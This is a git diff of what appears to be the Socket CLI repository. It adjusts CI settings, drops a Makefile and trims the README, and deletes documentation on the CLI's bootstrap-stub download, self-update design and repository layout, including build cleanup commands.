diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index d833940e3..e5743a087 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -36,8 +36,11 @@ jobs: uses: SocketDev/socket-registry/.github/workflows/ci.yml@1a96ced97aaa85d61543351b90d6f463b983c46c # main with: test-setup-script: 'pnpm --filter @socketsecurity/cli... run build' + # The check script runs both lint and type checking, so we need dependencies built. + lint-setup-script: 'pnpm --filter @socketsecurity/cli... run build' lint-script: 'pnpm --filter @socketsecurity/cli run check' - type-check-script: 'pnpm --filter @socketsecurity/cli run type' + # Skip redundant type-check since check script already runs it. + run-type-check: false run-test: false # Tests run in separate sharded job below. node-versions: ${{ inputs.node-versions || '["24.10.0"]' }} os-versions: '["ubuntu-latest"]' diff --git a/.gitignore b/.gitignore index b74abda72..71e4bd0ea 100644 --- a/.gitignore +++ b/.gitignore @@ -8,6 +8,7 @@ Thumbs.db /.rollup.cache /.vscode /external +/.node-version /npm-debug.log /yarn.lock /yarn.log diff --git a/.node-version b/.node-version deleted file mode 100644 index a45fd52cc..000000000 --- a/.node-version +++ /dev/null @@ -1 +0,0 @@ -24 diff --git a/Makefile b/Makefile deleted file mode 100644 index ba4e708d3..000000000 --- a/Makefile +++ /dev/null @@ -1,20 +0,0 @@ -# Makefile for Socket Mach-O compression tools -CXX := /usr/bin/clang++ -CXXFLAGS := -std=c++17 -O3 -Wall -Wextra -mmacosx-version-min=11.0 -LDFLAGS := -lcompression - -all: socket_macho_compress socket_macho_decompress - -socket_macho_compress: socket_macho_compress.cc - $(CXX) $(CXXFLAGS) -o $@ $< $(LDFLAGS) - @echo "✅ Built socket_macho_compress" - -socket_macho_decompress: socket_macho_decompress.cc - $(CXX) $(CXXFLAGS) -o $@ $< $(LDFLAGS) - @echo "✅ Built socket_macho_decompress" - -clean: - rm -f socket_macho_compress socket_macho_decompress - @echo "✅ Cleaned" - -.PHONY: all clean diff --git 
a/README.md b/README.md index 4dd404cf4..1b02869b4 100644 --- a/README.md +++ b/README.md @@ -100,11 +100,6 @@ Supports version 2 format with `projectIgnorePaths` for excluding files from rep ## Contributing -**New to Socket CLI development?** - -- **Quick Start (10 min)**: [Getting Started Guide](docs/getting-started.md) — Essential setup and first contribution -- **Detailed Guide**: [Development Getting Started](docs/development/getting-started.md) — Complete end-to-end onboarding - **Quick setup:** ```bash @@ -115,16 +110,6 @@ pnpm run build pnpm exec socket --version ``` -### Building locally - -Socket CLI uses an **intelligent build system with automatic caching** that only rebuilds packages when their source files change. The build system ensures packages are built in the correct dependency order: - -1. **Yoga WASM** - Terminal layout engine (tables, progress bars) -2. **CLI Package** - TypeScript compilation and bundling -3. **SEA Binary** - Node.js Single Executable Application - -> **Note**: ONNX Runtime WASM is temporarily disabled due to build issues. AI features use pre-built assets. - #### Quick start (easiest) The default build command automatically skips packages that are already up-to-date: @@ -221,9 +206,6 @@ pnpm run build --platforms --parallel Build individual packages directly with pnpm filters: ```bash -# Build ONNX Runtime WASM (for AI features) -pnpm --filter @socketsecurity/onnxruntime run build - # Build Yoga WASM (for terminal layouts) pnpm --filter @socketsecurity/yoga run build @@ -240,8 +222,6 @@ pnpm --filter @socketbin/node-sea-builder-builder run build pnpm run build --help ``` -See [docs/development/](docs/development/) for detailed development guides. 
- ### Development environment variables - `SOCKET_CLI_API_BASE_URL` - API base URL (default: `https://api.socket.dev/v0/`) @@ -435,7 +415,6 @@ try { - [Socket API Reference](https://docs.socket.dev/reference) - [Socket GitHub App](https://github.com/apps/socket-security) -- [`@socketsecurity/sdk`](https://github.com/SocketDev/socket-sdk-js) [Socket.dev]: https://socket.dev/ diff --git a/docs/README.md b/docs/README.md deleted file mode 100644 index 4fa25fa72..000000000 --- a/docs/README.md +++ /dev/null @@ -1,79 +0,0 @@ -# Socket CLI Documentation - -## New to Socket CLI Development? - -**Choose your path:** - -- **[Quick Start (10 min)](getting-started.md)** — Essential setup and first contribution -- **[Detailed Guide](development/getting-started.md)** — Complete end-to-end onboarding with troubleshooting - -The detailed guide includes: -- Prerequisites and installation -- Development workflow -- Testing strategies -- Troubleshooting guide - -## Documentation Organization - -📚 **[Documentation Organization Guide](documentation-organization.md)** - Complete guide to Socket CLI's 3-tier documentation hierarchy - -### Categories - -- **architecture/** - System design documents and flow diagrams -- **build/** - Node.js build system and patching documentation -- **configuration/** - Shared configuration architecture -- **development/** - Development tools and workflow -- **guides/** - User-facing how-to guides -- **performance/** - Performance optimization guides -- **technical/** - Low-level implementation details -- **testing/** - Testing strategies and guides - -## Quick Links - -### Architecture -- [Bootstrap/stub architecture](architecture/bootstrap-stub.md) -- [Repository structure](architecture/repository.md) -- [Stub execution flow](architecture/stub-execution.md) -- [Stub package](architecture/stub-package.md) -- [Unified binary design](architecture/unified-binary.md) - -### Build System -- [Build System Guide](build/README.md) - **Start here** - Complete 
build system overview -- [Build/dist structure](build/build-dist-structure.md) - Output directory structure -- [Caching strategy](build/caching-strategy.md) - How build caching works -- [WASM build guide](build/wasm-build-guide.md) - Building WASM packages -- [Node.js build quick reference](build/node-build-quick-reference.md) - Troubleshooting custom Node.js builds -- [Node.js patch creation guide](build/node-patch-creation-guide.md) - Creating Socket patches for Node.js -- [Node.js patch metadata](build/node-patch-metadata.md) - Patch metadata format -- [Node.js build order](build/node-build-order-explained.md) - Understanding patch application order - -### Configuration -- [Configuration migration guide](configuration/configuration-migration.md) -- [Configuration summary](configuration/configuration-summary.md) -- [Shared configuration architecture](configuration/shared-configuration-architecture.md) - -### Development -- [Getting started](development/getting-started.md) - Complete onboarding guide for new contributors -- [Babel plugins](development/babel-plugins.md) -- [Development linking](development/linking.md) -- [Platform support](development/platform-support.md) - -### Guides -- [CI setup for yao-pkg](guides/yao-pkg-ci.md) -- [Test yao-pkg binary](guides/testing-yao-pkg.md) - -### Performance -- [Build performance](performance/performance-build.md) -- [CI performance](performance/performance-ci.md) -- [Testing performance](performance/performance-testing.md) - -### Technical Details -- [Manifest management](technical/manifest-management.md) - Complete manifest API reference -- [Manifest extensions](technical/manifest-extensions.md) - Proposed future features -- [Metadata files](technical/metadata-files.md) - Metadata file formats -- [Patch cacache](technical/patch-cacache.md) - Patch backup and caching system - -### Testing -- [Local testing](testing/local-testing.md) -- [Smart test selection](testing/smart-test-selection.md) -- [Testing custom 
Node.js](testing/testing-custom-node.md) diff --git a/docs/architecture/bootstrap-stub.md b/docs/architecture/bootstrap-stub.md deleted file mode 100644 index d9a2c5819..000000000 --- a/docs/architecture/bootstrap-stub.md +++ /dev/null @@ -1,650 +0,0 @@ -# Bootstrap Stub Architecture - -This document describes Socket CLI's bootstrap stub architecture for distributing minimal executables that download the full CLI on first run. - -## Overview - -Socket CLI uses a **bootstrap stub pattern** where the distributed executable is a tiny wrapper (~1-5MB) that downloads the full CLI (~20MB) on first use. The stub remains "dumb" - its only job is to download and spawn the full CLI. The full CLI (in `~/.socket/_dlx/`) handles all functionality including updating both itself and the stub. - -This provides: - -- **Minimal download size**: Users download ~1-5MB stub vs ~20MB full CLI -- **Automatic updates**: CLI can self-update and update the stub without redistributing executables -- **Platform independence**: Same architecture works for SEA, yao-pkg, and standalone binaries -- **Disk efficiency**: One shared CLI installation for multiple users (system-wide installs) -- **Robust versioning**: SHA256 hash verification ensures stub integrity - -## Architecture Diagram - -``` -┌─────────────────────────────────────────────────────────┐ -│ Distributed Stub (~1-5MB) │ -│ │ -│ ┌───────────────────────────────────────────────────┐ │ -│ │ Bootstrap Stub (src/sea/bootstrap.mts) │ │ -│ │ │ │ -│ │ • Node.js runtime (embedded, minimal) │ │ -│ │ • Ultra-thin wrapper (~280 lines) │ │ -│ │ • No external dependencies │ │ -│ │ • Computes own SHA256 hash │ │ -│ └───────────────────────────────────────────────────┘ │ -└─────────────────────────────────────────────────────────┘ - │ - │ First run - ▼ -┌─────────────────────────────────────────────────────────┐ -│ npm Registry (registry.npmjs.org) │ -│ │ -│ @socketsecurity/cli@latest (~20MB) │ 
-└─────────────────────────────────────────────────────────┘ - │ - │ Download & extract - ▼ -┌─────────────────────────────────────────────────────────┐ -│ ~/.socket/_dlx/ (User's home directory) │ -│ │ -│ ├── package.json │ -│ ├── dist/ │ -│ │ ├── cli.js (Main entry point - SMART) │ -│ │ ├── commands/self-update/ (Can update CLI+stub) │ -│ │ ├── utils.js │ -│ │ ├── vendor.js │ -│ │ └── external/ │ -│ ├── node_modules/ (Installed dependencies) │ -│ ├── requirements.json │ -│ ├── translations.json │ -│ └── shadow-bin/ │ -└─────────────────────────────────────────────────────────┘ - │ - │ Subsequent runs (with IPC) - ▼ -┌─────────────────────────────────────────────────────────┐ -│ System Node.js (from PATH) │ -│ │ -│ $ node ~/.socket/_dlx/dist/cli.js [args] │ -│ │ -│ IPC Channel receives from stub: │ -│ • SOCKET_CLI_STUB_PATH (e.g., /usr/local/bin/socket)│ -│ • SOCKET_CLI_STUB_HASH (SHA256) │ -│ • SOCKET_CLI_STUB_SIZE (bytes) │ -└─────────────────────────────────────────────────────────┘ -``` - -## Bootstrap Launcher Implementation - -### Location - -`src/sea/bootstrap.mts` - Ultra-thin bootstrap wrapper - -### Key Features - -1. **Zero external dependencies** - Only Node.js built-ins (fs, path, crypto, child_process) -2. **Minimal code** - ~250 lines including comments and safety checks -3. **Configurable** - Environment variables for custom registries and paths -4. **Safe** - Path traversal protection, atomic operations -5. 
**Fast** - Parallel downloads, efficient extraction - -### Bootstrap Flow - -```mermaid -flowchart TD - A[User runs socket executable] --> B{CLI installed?} - B -->|No| C[Download @socketsecurity/cli from npm] - B -->|Yes| H[Get installed version] - C --> D[Extract tarball to ~/.socket/tmp/] - D --> E[Run npm install --production] - E --> F[Move to ~/.socket/_dlx/] - F --> G[Read package.json for entry point] - H --> G - G --> I[Spawn: node ~/.socket/_dlx/dist/cli.js args] - I --> J[Forward all stdio] - J --> K[Exit with CLI exit code] -``` - -### Configuration - -Environment variables for customization: - -| Variable | Default | Description | -|----------|---------|-------------| -| `SOCKET_HOME` | `~/.socket` | Root directory for Socket CLI data | -| `SOCKET_CLI_DIR` | `~/.socket/_dlx` | CLI installation directory | -| `SOCKET_CLI_PACKAGE` | `@socketsecurity/cli` | npm package name | -| `SOCKET_NPM_REGISTRY` | `https://registry.npmjs.org` | npm registry URL | -| `NPM_REGISTRY` | (fallback) | Alternative registry env var | - -### Example Usage - -```bash -# First run - downloads CLI -$ ./socket --version -First run detected. Downloading Socket CLI from npm... -Downloading @socketsecurity/cli@1.1.24 from npm... -Installing dependencies... -Socket CLI downloaded successfully! -socket/1.1.24 - -# Subsequent runs - uses cached CLI -$ ./socket scan create -[Normal CLI output...] 
-``` - -## Installation Locations - -### Default Paths - -- **Linux/macOS**: `~/.socket/_dlx/` -- **Windows**: `%USERPROFILE%\.socket\cli\` - -### Directory Structure - -``` -~/.socket/ -├── _cli/ # Downloaded CLI installation -│ ├── package.json # CLI package metadata -│ ├── dist/ # Rollup distribution -│ │ ├── cli.js # Main entry point -│ │ ├── npm-cli.js # npm wrapper -│ │ ├── npx-cli.js # npx wrapper -│ │ ├── constants.js -│ │ ├── utils.js -│ │ ├── vendor.js # Bundled dependencies -│ │ ├── external/ # External dependencies -│ │ │ ├── @socketsecurity/ -│ │ │ └── ink/ -│ │ └── types/ # TypeScript definitions -│ ├── node_modules/ # Installed dependencies -│ ├── requirements.json # Package requirements -│ ├── translations.json # i18n translations -│ └── shadow-bin/ # Shadow binaries -│ ├── npm -│ └── npx -└── tmp/ # Temporary download directory - └── [hash]/ # Per-version temp dir - └── package.tgz # Downloaded tarball -``` - -### Disk Usage - -| Component | Size | Notes | -|-----------|------|-------| -| Bootstrap executable | ~1MB | Distributed to users | -| Downloaded CLI | ~30MB | Cached in `~/.socket/_dlx/` | -| node_modules/ | ~15MB | Production dependencies only | -| **Total** | **~45MB** | One-time download | - -## Self-Update Architecture - -### Overview - -Socket CLI implements a **two-tier update system**: - -1. **CLI Self-Update**: The full CLI (`~/.socket/_dlx/`) can update itself -2. **Stub Update**: The CLI can also update the stub binary that launched it - -The stub remains "dumb" and never updates itself. All update logic lives in the full CLI. - -### IPC Communication Flow - -``` -┌──────────────────────┐ -│ Stub Binary │ -│ (socket executable) │ -│ - DUMB: only knows │ -│ its own location │ -└──────────────────────┘ - │ - │ 1. Spawn CLI with IPC channel - │ stdio: ['inherit', 'inherit', 'inherit', 'ipc'] - │ - │ 2. 
Send stub location via IPC - │ { SOCKET_CLI_STUB_PATH: process.argv[0] } - ▼ -┌──────────────────────────────────────┐ -│ Full CLI (~/.socket/_dlx/dist/cli.js) │ -│ - SMART: handles all logic │ -├──────────────────────────────────────┤ -│ Receives via IPC: │ -│ • SOCKET_CLI_STUB_PATH │ -│ │ -│ On self-update: │ -│ 1. Check CLI version │ -│ 2. Download new CLI if needed │ -│ 3. Read stub at STUB_PATH │ -│ 4. Compute SHA256 hash │ -│ 5. Compare vs known-good hashes │ -│ 6. Download new stub if outdated │ -│ 7. Atomically replace stub binary │ -└──────────────────────────────────────┘ -``` - -### Stub Sends Location Only - -The stub only sends its own location - it doesn't compute hashes or sizes: - -```typescript -// In bootstrap.mts (lines 259-266) -child.on('spawn', () => { - const stubPath = process.argv[0] - if (stubPath) { - child.send?.({ - SOCKET_CLI_STUB_PATH: stubPath, - }) - } -}) -``` - -This keeps the stub **ultra-minimal** - all intelligence lives in the CLI. - -### CLI Receives Stub Location - -The CLI receives only the stub path via IPC (implemented in `src/utils/stub-ipc.mts` and `src/cli.mts`): - -```typescript -// In constants.mts (lines 222-231) -export type IpcObject = Readonly<{ - // ... 
other IPC fields - SOCKET_CLI_STUB_PATH?: string | undefined -}> - -// In cli.mts - Initialize at startup -initStubIpcHandler() - -// In stub-ipc.mts - Store received path -let stubPath: string | undefined - -process.on('message', (message: unknown) => { - if (message && typeof message === 'object' && 'SOCKET_CLI_STUB_PATH' in message) { - stubPath = (message as IpcObject).SOCKET_CLI_STUB_PATH - } -}) - -// Export getter for other modules -export function getStubPath(): string | undefined { - return stubPath -} -``` - -### CLI Computes Hash When Needed - -The CLI reads and hashes the stub only when checking for updates (in `src/commands/self-update/handle-self-update.mts`): - -```typescript -// Get stub path from IPC -const stubPath = getStubPath() - -if (stubPath && existsSync(stubPath)) { - // Read stub binary - const stubContent = await fs.readFile(stubPath) - - // Compute hash - const currentHash = crypto.createHash('sha256') - .update(stubContent) - .digest('hex') - - // Compare against available stub assets in release - // ... rest of update logic -} -``` - -### Stub Update Process - -When `socket self-update` runs (implemented in `src/commands/self-update/handle-self-update.mts`): - -```typescript -// Get stub path from IPC (received at CLI startup) -const stubPath = getStubPath() - -if (stubPath && existsSync(stubPath)) { - // 1. Read current stub binary and compute hash - const stubContent = await fs.readFile(stubPath) - const currentHash = crypto.createHash('sha256') - .update(stubContent) - .digest('hex') - - logger.info(`Current stub hash: ${currentHash}`) - - // 2. Check if stub asset exists in GitHub release - const stubAssetName = `socket-stub-${process.platform}-${process.arch}${process.platform === 'win32' ? '.exe' : ''}` - const stubAsset = release.assets.find(asset => asset.name === stubAssetName) - - if (stubAsset) { - // 3. Download new stub - await downloadFile(stubAsset.browser_download_url, downloadPath) - - // 4. 
Create backup of current stub - const backupPath = await createBackup(stubPath) - - // 5. Atomically replace stub binary - await replaceBinary(stagingPath, stubPath) - - logger.info('✓ Bootstrap stub updated successfully!') - } else { - logger.info('No stub binary found in release') - } -} -``` - -**Implementation Notes:** -- Stub update is called automatically during `socket self-update` -- Works even if CLI is already up-to-date (checks stub independently) -- Uses same atomic replacement logic as CLI binary updates -- Creates backups with rollback capability on failure -- Verifies stub integrity using SHA256 checksums from release metadata -- Downloads from HTTPS + GitHub releases with cryptographic hash verification - -### Atomic Stub Replacement - -Similar to SEA binary updates (from `handle-self-update.mts:192-227`): - -```typescript -async function replaceStub(newPath: string, currentPath: string): Promise { - // Ensure executable and clear macOS quarantine - await ensureExecutable(newPath) - await clearQuarantine(newPath) - - if (process.platform === 'win32') { - // Windows: Move current to temp, then replace - const tempName = `${currentPath}.old.${Date.now()}` - await fs.rename(currentPath, tempName) - - try { - await fs.rename(newPath, currentPath) - await remove(tempName).catch(() => {}) - } catch (error) { - // Restore on failure - await fs.rename(tempName, currentPath).catch(() => {}) - throw error - } - } else { - // Unix: Atomic rename - await fs.rename(newPath, currentPath) - } -} -``` - -### Security Considerations - -#### Hash-Based Verification - -- **Algorithm**: SHA256 (256-bit, cryptographically secure) -- **Performance**: ~5ms for 5KB stub, ~20ms for 20MB CLI -- **Integrity**: Detects any bit-level corruption or tampering - -#### Known-Good Hashes - -Stub hashes are stored in: -1. **npm package metadata**: `@socketsecurity/cli` package.json -2. **GitHub release assets**: `stub-hashes.json` in each release -3. 
**Embedded in CLI**: Compiled-in hash map for offline verification - -Example `stub-hashes.json`: -```json -{ - "1.1.24": { - "darwin-arm64": "81b27bcc09c973dd2a4d1edd1b1b963eb3ee7f363c32fc889ba5f7ac3f37ad55", - "darwin-x64": "f3a8c2b9...", - "linux-arm64": "9d4e5f1a...", - "linux-x64": "2c7b8d3e...", - "win32-x64": "6a1f9c4b..." - } -} -``` - -### Manual Updates - -Users can manually update: - -```bash -# Update CLI only (stub checks and downloads if needed) -socket self-update - -# Force re-download CLI (stub will re-download on next run) -rm -rf ~/.socket/_dlx -socket --version - -# Clean everything including temp files -rm -rf ~/.socket -socket --version -``` - -## Security Considerations - -### Package Integrity - -**Current:** -- Downloads from official npm registry (`registry.npmjs.org`) -- npm registry provides SHA integrity checks -- HTTPS transport encryption - -**Future Enhancements:** -- GPG signature verification of tarballs -- Subresource Integrity (SRI) for downloads -- Pinned version with hash verification - -### Path Safety - -Bootstrap includes path traversal protection: - -```javascript -// Prevents ../../../etc/passwd type attacks -if (!options?.force) { - const cwd = process.cwd() - const relation = path.relative(cwd, absolutePath) - const isInside = Boolean( - relation && - relation !== '..' && - !relation.startsWith(`..${path.sep}`) - ) - if (!isInside) { - throw new Error('Cannot delete files/directories outside cwd') - } -} -``` - -### Atomic Operations - -1. **Download to temp directory** (`~/.socket/tmp/[hash]/`) -2. **Extract and install** in temp location -3. **Atomic move** to final location -4. **Cleanup** temp on success or failure - -This prevents corrupted installations from partial downloads. 
- -## Platform Support - -### Supported Platforms - -| Platform | Support | Notes | -|----------|---------|-------| -| Linux x64 | ✅ Full | Primary platform | -| Linux ARM64 | ✅ Full | Raspberry Pi, AWS Graviton | -| macOS x64 | ✅ Full | Intel Macs | -| macOS ARM64 | ✅ Full | Apple Silicon | -| Windows x64 | ✅ Full | Requires system Node.js | -| Windows ARM64 | ⚠️ Limited | Experimental | - -### Platform-Specific Notes - -**macOS:** -- SEA executables are code-signed for Gatekeeper -- Ad-hoc signatures for local development -- Developer ID signatures for distribution - -**Windows:** -- Requires `tar` command (built-in on Windows 10+) -- Executable signing via `signtool` (optional) -- May trigger SmartScreen on first run (unsigned) - -**Linux:** -- Works on all major distributions -- No additional dependencies required -- AppImage support (future) - -## Build Variants - -Socket CLI supports multiple build variants with the same bootstrap architecture: - -### 1. SEA (Single Executable Application) - -**Size:** ~60-80MB -**Bootstrap:** Embedded in Node.js runtime -**Pros:** -- Official Node.js feature -- Good compression -- Native WASM support - -**Cons:** -- Larger than yao-pkg -- Slower build time - -### 2. yao-pkg (Package as executable) - -**Size:** ~44MB (macOS), ~22-31MB (Linux/Windows with UPX) -**Bootstrap:** Can be embedded or separate -**Pros:** -- Excellent compression (with UPX) -- Fast builds -- Mature tooling - -**Cons:** -- Requires custom Node.js build -- Community-maintained fork - -### 3. 
Standalone (npm install) - -**Size:** ~30MB (no bootstrap) -**Bootstrap:** Not applicable -**Pros:** -- No bundling overhead -- Standard npm workflow -- Easiest updates - -**Cons:** -- Requires Node.js pre-installed -- Slower startup (module resolution) - -## Comparison with Full Bundle - -| Metric | Bootstrap | Full Bundle | Difference | -|--------|-----------|-------------|------------| -| **Download size** | ~1MB | ~30MB | **97% smaller** | -| **First run time** | ~10s | <1s | Slower (download) | -| **Subsequent runs** | <1s | <1s | Same | -| **Disk usage** | ~45MB | ~30MB | +15MB (node_modules) | -| **Update method** | Delete cache | Redownload | Simpler | -| **Offline support** | After 1st run | Always | Limited | - -## Error Handling - -### Common Errors - -**No Node.js in PATH:** -``` -Error: Node.js is required to run Socket CLI -The SEA wrapper has downloaded the CLI but needs Node.js to execute it. -Please install Node.js from https://nodejs.org/ -``` - -**Network errors:** -``` -Failed to fetch package info: 404 Not Found -``` - -**Disk space:** -``` -ENOSPC: no space left on device -``` - -**Permissions:** -``` -EACCES: permission denied, mkdir '~/.socket/_dlx' -``` - -### Recovery - -Users can manually recover from errors: - -```bash -# Clean up corrupted installation -rm -rf ~/.socket/_dlx -rm -rf ~/.socket/tmp - -# Retry -socket --version -``` - -## Testing - -### Local Testing - -Test the bootstrap locally before distribution: - -```bash -# Build bootstrap bundle -pnpm run build --sea - -# Test first run (delete cache first) -rm -rf ~/.socket/_dlx -./socket --version - -# Test subsequent run -./socket --version - -# Test with custom registry -SOCKET_NPM_REGISTRY=http://localhost:4873 ./socket --version -``` - -### CI Testing - -Test bootstrap in CI: - -```yaml -- name: Test bootstrap launcher - run: | - # Build executable - pnpm run build --sea - - # Test first run - rm -rf ~/.socket/_dlx - ./socket --version - - # Verify installation - test -d 
~/.socket/_dlx - test -f ~/.socket/_dlx/package.json - - # Test subsequent run - ./socket --help -``` - -## Future Enhancements - -### Planned Features - -1. **Background updates**: Check for updates in background, download asynchronously -2. **Version pinning**: Lock to specific CLI version via config file -3. **Multi-version support**: Keep multiple CLI versions, switch via `socket use 1.2.3` -4. **Offline mode**: Bundle minimal CLI in executable as fallback -5. **Compression**: Use brotli/zstd for faster downloads -6. **Delta updates**: Download only changed files between versions -7. **Mirror support**: Fallback mirrors for registry downtime -8. **Telemetry**: Anonymous usage statistics for download success rates - -### Alternative Architectures - -**Hybrid bundle:** -- Include minimal CLI in executable (~5MB) -- Download full CLI on first use of advanced features -- Best of both worlds: fast startup + small size - -**Lazy loading:** -- Download commands on-demand -- `socket scan` downloads scan command only -- Reduces initial download to <100KB - -## References - -- Bootstrap implementation: `src/sea/bootstrap.mts` -- SEA documentation: `docs/SEA_PLATFORM_SUPPORT.md` -- yao-pkg documentation: `docs/YAO_PKG_BUILD.md` -- CI setup: `docs/YAO_PKG_CI_SETUP.md` diff --git a/docs/architecture/repository.md b/docs/architecture/repository.md deleted file mode 100644 index fb1d04ef2..000000000 --- a/docs/architecture/repository.md +++ /dev/null @@ -1,537 +0,0 @@ -# Socket CLI Repository Structure - -## Overview - -This document explains the organization of build artifacts, temporary files, and build scripts in the Socket CLI repository. - -## Directory Structure - -``` -socket-cli/ -├── .custom-node-build/ # Build artifacts (NOT in git) -│ ├── node-yao-pkg/ # Current Node.js v24.10.0 with yao-pkg patches -│ │ ├── out/Release/node # Built Node binary (~83MB) -│ │ └── ... 
# Node.js source (~19GB with build artifacts) -│ └── patches/ # Downloaded yao-pkg patches -│ └── node.v24.10.0.cpp.patch -├── pkg-binaries/ # pkg output binaries (NOT in git) -│ ├── socket-macos-arm64 # Built pkg executable (~90-110MB) -│ ├── socket-macos-x64 -│ ├── socket-linux-x64 -│ ├── socket-linux-arm64 -│ ├── socket-win-x64 -│ └── socket-win-arm64 -├── dist/ # Rollup output (NOT in git) -│ ├── cli.js # Bundled CLI code -│ ├── vendor.js # Bundled dependencies -│ └── ... -├── scripts/ # Build scripts (IN git) -│ ├── build.mjs # Main build script (rollup) -│ ├── build-yao-pkg-node.sh # Script to build custom Node.js -│ ├── babel/ # Custom Babel plugins -│ │ ├── babel-plugin-strict-mode.mjs -│ │ ├── babel-plugin-remove-icu.mjs -│ │ └── README.md -│ └── ... -├── patches/ # Socket CLI patches (IN git) -│ └── yoga-layout.patch # Patch for yoga-layout WASM -├── pkg.json # pkg configuration (IN git) -├── .gitignore # Ignores build artifacts -└── docs/ # Documentation (IN git) - ├── YAO_PKG_BUILD.md - ├── BABEL_PLUGINS.md - ├── PKG_PLATFORM_SUPPORT.md - └── REPOSITORY_STRUCTURE.md (this file) -``` - ---- - -## What's In Version Control (Git) - -### Source Code -- `src/` - TypeScript source files -- `test/` - Test files -- `scripts/` - Build scripts -- `patches/` - Socket CLI patches (yoga-layout, etc.) - -### Configuration Files -- `package.json` - npm package configuration -- `pnpm-lock.yaml` - Dependency lock file -- `pkg.json` - pkg/yao-pkg configuration -- `tsconfig.json` - TypeScript configuration -- `.config/` - Build tool configurations (rollup, babel, etc.) 
- -### Documentation -- `docs/` - All documentation files -- `README.md` - Main readme -- `CHANGELOG.md` - Version history -- `CLAUDE.md` - Development guidelines - -### CI/CD -- `.github/workflows/` - GitHub Actions workflows - ---- - -## What's NOT In Version Control (Gitignored) - -### Build Artifacts (Output) -```gitignore -dist/ # Rollup bundled output -pkg-binaries/ # pkg executable binaries -/socket # Built pkg binary in root -/socket-* # Built pkg binaries in root (any platform) -``` - -### Node.js Build Artifacts -```gitignore -.custom-node-build/ # All Node.js build files -``` - -**Why gitignored:** -- **Large size:** ~19-20GB per Node.js build with artifacts -- **Platform-specific:** Built binaries only work on target platform -- **Reproducible:** Can be rebuilt anytime from source using build script -- **Temporary:** Build artifacts change frequently - -### Dependency Directories -```gitignore -node_modules/ # npm/pnpm dependencies -.yarn/ # Yarn PnP files -.pnp.cjs # Yarn PnP loader -``` - -### Cache & Temporary Files -```gitignore -.rollup.cache/ # Rollup incremental build cache -.cache/ # Generic cache directory -**/.cache # Cache in any subdirectory -.type-coverage/ # Type coverage cache -*.tsbuildinfo # TypeScript incremental build info -``` - -### IDE & System Files -```gitignore -.vscode/ # VS Code settings (except extensions.json) -.DS_Store # macOS Finder metadata -Thumbs.db # Windows Explorer metadata -``` - -### Environment Files -```gitignore -.env # Local environment variables -.nvm/ # nvm Node version manager -.node-version # Node version pinning -``` - ---- - -## Build Artifact Locations - -### 1. Custom Node.js Build - -**Location:** `.custom-node-build/node-yao-pkg/` -**Size:** ~19-20GB (source + build artifacts) -**Binary:** `.custom-node-build/node-yao-pkg/out/Release/node` (~83MB) - -**Created by:** -```bash -pnpm run build:yao-pkg:node -# Runs: scripts/build-yao-pkg-node.sh -``` - -**What it does:** -1. 
Downloads Node.js v24.10.0 source from GitHub (~1.5GB) -2. Downloads yao-pkg patch from pkg-fetch repo (~33KB) -3. Applies patch to Node.js source -4. Configures with size optimizations -5. Builds with all CPU cores (~30-60 minutes) -6. Produces optimized Node binary (~83MB) - -**Cleanup:** -```bash -# Remove old/unused Node builds (saves ~40GB) -rm -rf .custom-node-build/node -rm -rf .custom-node-build/node-patched - -# Keep only current build -# .custom-node-build/node-yao-pkg -``` - -### 2. Socket CLI Distribution - -**Location:** `dist/` -**Size:** ~10-15MB -**Key files:** -- `dist/cli.js` - Main CLI entry point -- `dist/vendor.js` - Bundled dependencies -- `dist/constants.js` - CLI constants -- `dist/utils.js` - Utility functions - -**Created by:** -```bash -pnpm run build:cli -# Runs: rollup with .config/rollup.dist.config.mjs -``` - -**What it does:** -1. Compiles TypeScript to JavaScript -2. Bundles with rollup -3. Applies Babel transformations: - - Strict-mode conversion - - ICU removal (optional) - - `__proto__` transformations -4. Outputs to `dist/` - -**Cleanup:** -```bash -pnpm run clean:dist -# Removes dist/ directory -``` - -### 3. pkg Binaries - -**Location:** `pkg-binaries/` -**Size:** ~90-110MB per binary -**Files:** -- `socket-macos-arm64` - macOS Apple Silicon -- `socket-macos-x64` - macOS Intel -- `socket-linux-x64` - Linux x86_64 (most Docker) -- `socket-linux-arm64` - Linux ARM64 (AWS Graviton) -- `socket-win-x64.exe` - Windows x86_64 -- `socket-win-arm64.exe` - Windows ARM64 - -**Created by:** -```bash -pnpm run build:yao-pkg -# Runs: pnpm exec pkg . (uses pkg.json config) -``` - -**What it does:** -1. Reads `pkg.json` configuration -2. Uses custom Node.js binary from `.custom-node-build/node-yao-pkg/out/Release/node` -3. Bundles `dist/` files as V8 bytecode -4. Embeds assets in virtual filesystem -5. 
Creates standalone executables - -**Cleanup:** -```bash -rm -rf pkg-binaries/ -# Or keep only the platform you need -rm pkg-binaries/socket-win-* # Remove Windows binaries -rm pkg-binaries/socket-macos-* # Remove macOS binaries -``` - -### 4. Patches - -**Location:** `patches/` (IN git) and `.custom-node-build/patches/` (NOT in git) - -#### Socket CLI Patches (tracked) -``` -patches/ -└── yoga-layout.patch # Patch for yoga-layout WASM support -``` - -**Purpose:** Enable yoga-layout to work in pkg binaries by creating synchronous WASM entry point. - -**Applied by:** pnpm (automatically via `pnpm-lock.yaml`) - -#### yao-pkg Patches (not tracked) -``` -.custom-node-build/patches/ -└── node.v24.10.0.cpp.patch # Official yao-pkg patch for Node.js -``` - -**Purpose:** Enable V8 bytecode compilation in Node.js - -**Applied by:** `scripts/build-yao-pkg-node.sh` - -**Downloaded from:** https://github.com/yao-pkg/pkg-fetch - ---- - -## Disk Space Usage - -### Development Environment -``` -Total: ~50-60GB - -node_modules/ ~2-3 GB (dependencies) -.custom-node-build/ ~20-40 GB (Node.js builds) - ├── node-yao-pkg/ ~19-20 GB (current, keep) - ├── node-patched/ ~20 GB (old, can delete) - └── node/ ~20 GB (old, can delete) -dist/ ~10-15 MB (rollup output) -pkg-binaries/ ~500 MB (6 binaries × ~90MB) -``` - -### Minimal Build Environment -``` -Total: ~22-25GB - -node_modules/ ~2-3 GB -.custom-node-build/ ~19-20 GB (only node-yao-pkg) -``` - -### CI/CD Environment -``` -Total: ~5-10GB - -node_modules/ ~2-3 GB -Pre-built Node binary ~83 MB (download from release) -dist/ ~10-15 MB -pkg-binaries/ ~90-110 MB per platform -``` - ---- - -## Cleanup Scripts - -### Remove Old Node Builds - -```bash -#!/usr/bin/env bash -# scripts/cleanup-old-node-builds.sh - -echo "Removing old Node.js builds..." 
